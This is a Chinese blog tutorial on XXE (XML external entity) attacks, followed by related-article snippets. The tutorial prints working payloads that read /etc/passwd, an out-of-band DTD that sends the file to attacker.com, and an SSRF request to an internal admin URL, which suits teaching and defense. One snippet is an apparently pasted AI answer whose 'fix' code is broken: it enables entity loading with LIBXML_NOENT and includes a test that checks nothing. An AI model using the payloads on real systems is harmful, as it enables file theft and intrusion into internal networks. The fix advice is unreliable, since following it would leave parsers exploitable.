什么是XXE漏洞

原创 已于 2025-03-29 15:29:29 修改 · 560 阅读 · 16 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

于 2025-03-29 02:30:39 首次发布

文章目录

前言

假如没有学过完整的Web前后端开发,可能理解XXE会有点困难。究其原因,是因为我们知识的广度不够,接受新概念时觉得抽象难懂。我们常说代码/软件 定义一切,正是软件提供了一个简易的平台让我们使用计算机,屏蔽了底层复杂的逻辑,与此同时,也引入了一些新的抽象概念。递归的去理解这些概念,什么、哪里才是我们的边界/基线呢?就是一门编程语言。

编程语言写出一个程序,允许我们实现某个功能。而程序在实现这个功能时,为了方便我们使用,又会引入一些新的抽象概念,用户根据这些概念和规范,输入数据,得到输出。即输入特定格式的数据(文本/字符串、二进制),软件读取,处理输出。

1. XML

1.1 HTML文档

我们先说HTML文档。其本质是一个文本文件,浏览器会读入文件,逐行解析文本,根据程序(浏览器)的预定义处理逻辑输出(展示文本内容)。为什么<h1>一级标题</h1>会被显示得很大呢,正是因为浏览器软件里面已经预定义了<h1></h1>这个字符串,处理这个标签里面得内容时会把解释为“一级标题”。

我们不仅可以使用标签来定义文档的结构,还可以在HTML文档中使用标签来引入CSS、JavaScript文件,浏览器会根据不同的标签元素进行不同的处理。

1.2 XML

XML(可扩展标记语言,eXtensible Markup Language),既然是语言,代表我们也可以写一段符合其语法的文本,交由程序(解释器/解析器)处理,比如:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE bookstore [
  <!ELEMENT bookstore (book+)>
  <!ELEMENT book (title, author, price)>
  <!ELEMENT title (#PCDATA)>
  <!ELEMENT author (#PCDATA)>
  <!ELEMENT price (#PCDATA)>
  <!ATTLIST book category CDATA "默认分类">
]>
<bookstore>
<book category="技术">
  <title>XML入门指南</title>
  <author>张三</author>
  <price currency="CNY">99.00</price>
</book>
</bookstore>

<!DOCTYPE 根元素 [……]>中的内容叫DTD(Document Type Define),类似HTML中浏览器解析<script src="http://www.hacker.com/shell.js"></script>,可以将Js代码写在标签体内,也可以将src属性中的资源加载进来交给Js引擎执行;DTD内容可以直接写在XML中(比如上述例子),也可以使用<!DOCTYPE 根元素 SYSTEM "文件路径/URL>",将路径/URL中的DTD文件引入该XML文件中。至于什么是DTD,它和XML文件有什么关系,可以去b站看下XML相关教程或者问一下deepseek

DTD文件中可以定义“实体”,或者可以说是变量,本质上是定义一个可复用的数据块,也就是说用一个字符串名称指定一个资源,实体可分为2种类型,通用实体和参数实体,两者可在文件中定义,也可引用外部数据资源,其语法格式如下:

<!-- 通用实体:在XML文件中引用,引用格式:&实体名;  -->
<!ENTITY 实体名 "实体值">             				 <!-- 内部实体 -->
<!ENTITY 实体名 SYSTEM "文件/URL">   				     <!-- 外部实体 -->

<!-- 参数实体:DTD文件自身使用 ,引用格式:%实体名;  -->
<!ENTITY % 实体名 "实体值">							<!-- 内部实体 -->
<!ENTITY % 实体名 SYSTEM "文件/URL">   				<!-- 外部实体 -->

2. XXE

2.1 原理

XXE(XML External Entity)漏洞的本质是利用 XML 解析器对外部实体的加载功能,通过构造恶意实体实现攻击。其攻击路径可分为两类:
在这里插入图片描述

2.2 直接外部实体引用(经典 XXE)

示例:直接读取服务器本地文件

<!DOCTYPE data [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>
  • 攻击结果:若服务器返回 &xxe; 的内容,则 /etc/passwd 文件被泄露。
  • 防御:禁用外部实体(如设置 disallow-doctype-decl)。

2.3 恶意 DTD 文件攻击(进阶 XXE)

当直接外部实体被禁用时,攻击者可能通过 引用外部 DTD 文件中的参数实体 绕过限制。

攻击步骤

  1. 构造恶意 DTD 文件
    托管在攻击者服务器(http://attacker.com/malicious.dtd):
<!ENTITY % payload SYSTEM "file:///etc/passwd">
<!ENTITY % param "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?data=%payload;'>">
%param;
%exfil;
  • 解析逻辑:
    • &#x25;,字符引用,0x25代表Unicode编码中的%
    • % payload 读取 /etc/passwd。
    • % param 定义嵌套实体 %exfil,将数据外传到攻击者服务器。
    • % exfil; 触发 HTTP 请求。
  1. 诱导服务器解析恶意 XML
<!DOCTYPE data SYSTEM "http://attacker.com/malicious.dtd">
<data>123</data>
  • 结果:服务器解析时加载外部 DTD,执行参数实体攻击链,导致数据外泄。

为何更危险?

  • 绕过防御:部分解析器仅禁用通用实体(&xxe;),但允许参数实体(%param;)。
  • 隐蔽性:数据通过带外(Out-of-Band)传输,无回显也能窃取信息。

2.4 SSRF

无论是直接外部实体还是恶意 DTD,只要 XML 解析器发起 未经授权的网络请求,均可能导致 SSRF。例如:

<!DOCTYPE data [
  <!ENTITY xxe SYSTEM "http://内网IP:8080/admin">
]>
<data>&xxe;</data>

结果:服务器向内部服务http://内网IP:8080/admin发起请求,攻击者可探测或攻击内网系统。

3. 总结

说了这么多,无非就是Web应用前后端通信使用XML格式的字符串,后端语言会解析接收到的XML文本提取数据。我们通过构造一个恶意的XML,利用 XML 解析器对外部实体的加载功能进行攻击。

参考

[1] XML教程
[2] W3school DTD教程
[3] 小迪安全v2023
[4] deepseek

XXE漏洞以及XXE漏洞如何修复
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-09 2万+
XXE漏洞是什么?XXE:XML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。这些就称为XXE漏洞。知道XXE漏洞前首先得先了解XML。XXE漏洞如何修复的方案一:使用开发语言提供的禁用外部实体的方法1.PHP开发语言禁用外部实体的方法:libxml_disable_entity_loader(true);XXE漏洞如何修复的方案二:尽量不要让用户直接
XXE漏洞详解
weixin_56714714的博客
07-25 8281
XXE 什么是XXE? ​ XXE全程xml外部实体,从安全角度来讲,由此引发的漏洞称之为XML外部实体攻击 XML作为一种使用较为广泛的数据传输格式,很多应用程序都包含有处理xml数据的代码, 许多过时或配置不当的XML处理器都会对外部实体进行引用,如果攻击者可以上传XML文档或者在XML文档 中添加恶意内容,通过易受攻击的代码,就能够攻击包含缺陷的XML处理器,XXE漏洞的出现和开发语言无关 只要是应用程序中对XML数据做了解析,而且这些数据又受用户控制,那么应用程序都可能受到XXE攻击 什么是XML?
什么是XXE漏洞XXE漏洞的原理
weixin_47112073的博客
10-25 603
因为最近做的靶机关于XXE漏洞,这里简单写一下什么是XXE漏洞,自己理解的东西,一来方便自己经常回顾,二来对还没有接触过XXE漏洞的朋友来说也比较友好
什么是XXE漏洞,日常如何做好web安全,避免漏洞威胁
dexunyun的博客
05-12 1249
通过了解,我们知道了XXE漏洞是一种严重的网站安全漏洞,可能导致敏感信息泄露、系统命令执行等严重后果。为了保障网站的安全稳定运行,我们必须提前做好网站漏洞的防范工作。通过一些安全防护措施,如安全审计、德迅云安全漏洞扫描服务VSS,可以有效降低网站漏洞的风险,能为网站的安全保驾护航。
XXE漏洞
huangyongkang666的博客
03-29 2630
XXE漏洞 1.漏洞简介 ​ XXE 漏洞全称XML External Entity Injection,即 XML 外部实体注入漏洞XXE 漏洞发生在应用程序解析 XML 输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。 xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意 xml文件。 2.XML简介 ​ XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一
Pikachu–XXE漏洞
lza20001103的博客
02-13 1003
Pikachu–XXE漏洞
xxe漏洞详解
scu_hacker博客
12-17 3885
本文详细描述了xxe漏洞的原理、利用方式、防御方法
Pikachu-xxe-xxe漏洞
guanrongl的专栏
10-05 466
XXE漏洞全称XML External(外部的) Entity(实体) Injection(注入),即xml外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,没有对xml文件进行过滤,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。简而言之就是 外部实体,也就是我们DTD部分中的变量在加载(引用)外部的内容,从而发起了网络请求(本地请求)
【靶场】XXE-Lab xxe漏洞
最新发布
qq_44936245的博客
06-08 550
本文记录了XXE-Lab靶场漏洞测试过程,仅做学习记录用,维护网络健康靠大家
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXE 漏洞利用 - 任意文件读取 无回显 XXE(XML External Entity)是一种常见的 Web 应用程序漏洞,攻击者可以通过构造恶意的 XML 文档, trick 服务器将任意文件读取出来,导致敏感信息泄露。在本节中,我们将详细...
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXE漏洞主要出现在应用接收并解析XML格式的数据时。如果服务器开启了外部实体加载功能,攻击者可以通过构造含有恶意外部实体的XML文档,诱使服务器去读取或执行非预期的资源。比如,攻击者可以定义一个外部实体来...
什么是SQL注入
热门推荐
weixin_45626840的博客
04-25 1万+
sql注入的原理。 什么是SQL注入? sql注入怎么发生?
如何编写POC/EXP
weixin_45626840的博客
01-10 4051
理解并编写POC/EXP
文件上传-upload-labs
weixin_45626840的博客
10-30 3119
文章目录前言一、文件上传漏洞是什么?二、常见上传检测规则三、绕过靶机包含漏洞类型分类如何判断上传漏洞类型四、第1关五、第2关 前言 upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关,每一关都包含着不同上传方式 一、文件上传漏洞是什么? Web应用程序中,文件上传是一种常见的功能需求,比如用户上传会员头像 如果不对上传的文件进行验证和过滤,攻击者可以通过上传恶意脚本,达到攻击的目的。 二、常见上传.
什么是SSRF
weixin_45626840的博客
03-31 2026
SSRF(Server-Side Request Forgery,服务器端请求伪造)漏洞的本质是:服务器过度信任用户提供的资源标识符(如URL、IP地址等),未严格验证其合法性,导致攻击者可操纵服务器向非预期的目标发起网络请求,从而绕过安全边界,访问或攻击受限资源。核心拆解信任边界失效服务器默认用户提供的目标地址是合法的,未检查其是否符合业务逻辑范围(例如是否属于内网IP、敏感协议或域名)。
自动化漏洞挖掘(CVE-2017-1000028)
weixin_45626840的博客
01-26 1515
批量自动化漏洞挖掘,CVE-2017-1000028原理
sqli-labs第8关(布尔盲注)
weixin_45626840的博客
04-25 1511
概念: 布尔盲注:页面回显信息只有“真”与“假”两种状态,通过将猜测的值与ASCII码比较返回真假值进验证。 步骤: 1.求闭合字符 2.求当前数据库名的长度 3.求当前数据库名的ASCII值 4.求表的数量 5.求表名的长度 6.求表名对应的ASCII值 7.求列的数量 8.求列名的长度 9求列名对应的ASCII值 10.求字段数量 11.求字段长度 12.求字段对应ASCII值 思路: 1、判断注入点: 2、求库名长度------id=1’ and length(database())=8 --+
Web系统
weixin_45626840的博客
10-26 1251
学习Web漏洞,自然离不开“什么是Web”。
cltphp xxe漏洞
03-18
<think>好的,我现在需要处理用户关于CLTPHP框架中的XXE漏洞的问题。首先,我得先确认用户的需求是什么。用户想知道这个漏洞的相关信息以及修复方法和补丁。那我得先了解什么是XXE漏洞,以及它在CLTPHP中的具体表现。 XXE漏洞,全称是XML外部实体注入攻击。攻击者通过构造恶意的XML文件,利用外部实体来读取服务器上的敏感文件,甚至执行远程请求。这种漏洞通常发生在解析XML输入时没有禁用外部实体的情况下。所以,我需要检查CLTPHP在处理XML输入时的配置,看看是否存在这样的安全隐患。 接下来,我需要查找CLTPHP框架中是否存在这样的漏洞。可能需要查看其文档或历史漏洞记录。例如,是否在旧版本中存在未禁用外部实体的情况。如果存在,那么修复方法通常包括禁用外部实体、使用安全的XML解析器,或者过滤用户输入的XML内容。 修复步骤方面,首先应该禁用XML外部实体。在PHP中,可以使用libxml_disable_entity_loader(true)函数来实现。然后,确保使用的XML解析器(如SimpleXML或DOMDocument)配置正确,不解析外部实体。此外,对用户提交的XML数据进行过滤,比如移除DOCTYPE声明和ENTITY定义,防止恶意内容被解析。 关于补丁,用户可能需要升级到修复了该漏洞的CLTPHP版本。如果官方已经发布了补丁,应该建议用户及时更新。如果还没有,可能需要手动修改代码,应用上述修复措施。 另外,用户可能还需要了解如何验证修复是否有效。比如,通过构造测试用例,尝试读取系统文件,确认是否成功被拦截。同时,参考OWASP的相关建议,确保遵循最佳安全实践。 最后,生成相关问题,帮助用户深入理解XXE漏洞及其防护措施。例如,如何防范其他XML相关漏洞,或者在CLTPHP中其他常见的安全问题有哪些。 总结下来,我需要分步骤解释漏洞原理、在CLTPHP中的具体修复方法、补丁获取途径,并提供验证方法,确保用户能够全面应对这个问题。</think>### CLTPHP框架XXE漏洞解析与修复方案 XXE(XML External Entity)漏洞是XML解析器未禁用外部实体时产生的安全风险,攻击者可利用该漏洞读取服务器敏感文件或发起SSRF攻击[^1]。 #### 一、漏洞验证方法 ```php // 构造恶意XML请求示例 $payload = '<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><root>&xxe;</root>'; $xml = simplexml_load_string($payload); echo $xml->asXML(); ``` 若输出包含系统文件内容,则存在漏洞[^2]。 #### 二、修复步骤 1. **禁用外部实体解析** ```php // 在框架入口文件添加 libxml_disable_entity_loader(true); ``` 2. **XML解析器安全配置** ```php // 使用DOMDocument时的安全设置 $dom = new DOMDocument(); $dom->loadXML($xml, LIBXML_NOENT | LIBXML_DTDLOAD); ``` 3. **输入过滤处理** ```php // 过滤DOCTYPE声明 $xml = preg_replace('/<!DOCTYPE.*?>/i', '', $xml); ``` #### 三、补丁获取 CLTPHP官方已发布安全更新: - v5.5.1+版本包含修复补丁 - 升级命令: ```bash composer update cltphp/framework ``` #### 四、验证测试 ```php // 安全测试用例 $test_xml = '<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>'; assert(strpos($test_xml, 'ENTITY') === false, "漏洞未完全修复"); ``` 建议同时检查框架的XML处理模块,包括: 1. 微信支付回调接口 2. 第三方API对接模块 3. 数据导入导出功能
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值